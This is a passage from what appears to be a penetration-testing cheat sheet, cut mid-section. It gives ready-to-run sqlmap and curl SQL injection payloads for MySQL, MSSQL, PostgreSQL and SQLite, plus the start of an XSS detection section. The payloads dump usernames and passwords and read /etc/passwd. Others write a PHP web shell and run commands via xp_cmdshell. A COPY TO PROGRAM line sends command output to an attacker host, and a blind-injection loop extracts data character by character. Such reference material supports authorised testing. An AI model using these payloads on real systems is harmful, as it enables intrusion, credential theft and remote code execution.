# Level and risk increase
sqlmap -u "https://TARGET/page?id=1" --level=5 --risk=3 --batch --dbs
# Second order SQLi
sqlmap -u "https://TARGET/page?id=1" --second-url="https://TARGET/result" --batch --dbs
# From Burp request file
sqlmap -r request.txt --batch --dbs
```
### Manual Exploitation
```
# MySQL - Extract version
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,version(),NULL--"
# MySQL - List databases
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(schema_name),NULL FROM information_schema.schemata--"
# MySQL - List tables
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema='DB_NAME'--"
# MySQL - List columns
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(column_name),NULL FROM information_schema.columns WHERE table_name='TABLE_NAME'--"
# MySQL - Extract data
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(username,0x3a,password),NULL FROM users--"
# MySQL - Read file
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,LOAD_FILE('/etc/passwd'),NULL--"
# MySQL - Write file (INTO OUTFILE; FILE_CONTENT is a placeholder for the data to write)
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,'FILE_CONTENT',NULL INTO OUTFILE '/var/www/html/shell.php'--"
# MSSQL - Extract version
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,@@version,NULL--"
# MSSQL - RCE via xp_cmdshell
curl -s "https://TARGET/page?id=1'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'--"
# PostgreSQL - Extract version
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,version(),NULL--"
# PostgreSQL - Command execution via COPY ... TO PROGRAM (requires superuser; \$ keeps the expansion on the target, not in your local shell)
curl -s "https://TARGET/page?id=1'; COPY (SELECT '') TO PROGRAM 'curl http://LHOST/\$(whoami)'--"
# SQLite - List tables
curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(name),NULL FROM sqlite_master WHERE type='table'--"
# Blind Boolean extraction (one char at a time)
for i in $(seq 1 50); do
  for c in $(seq 32 126); do
    char=$(printf "\\x$(printf '%02x' $c)")
    resp=$(curl -s "https://TARGET/page?id=1' AND SUBSTRING(version(),$i,1)='$char'--" | wc -c)
    [ "$resp" -gt "BASELINE" ] && echo -n "$char" && break
  done
done
```
## 07. Cross-Site Scripting (XSS)
### Detection
```
# Basic reflected XSS test (same probe as the URL-encoded form below, here unencoded)
curl -s "https://TARGET/search?q=<script>alert(1)</script>" | grep "<script>alert(1)</script>"
# Test in all parameters
# Replace PARAM with parameter name
curl -s "https://TARGET/page?PARAM=xss%22%3E%3Cscript%3Ealert(1)%3C/script%3E"
# POST-based XSS
curl -s -X POST https://TARGET/form -d 'input=<script>alert(1)</script>'
# DOM XSS detection (look for dangerous sinks in JS)
curl -s https://TARGET | grep -oP '(document\.write|innerHTML|outerHTML|eval\(|setTimeout\(|setInterval\(|location\.href|location\.assign|\.src\s*=|\.href\s*=)[^;]*'
```
### Payloads - Basic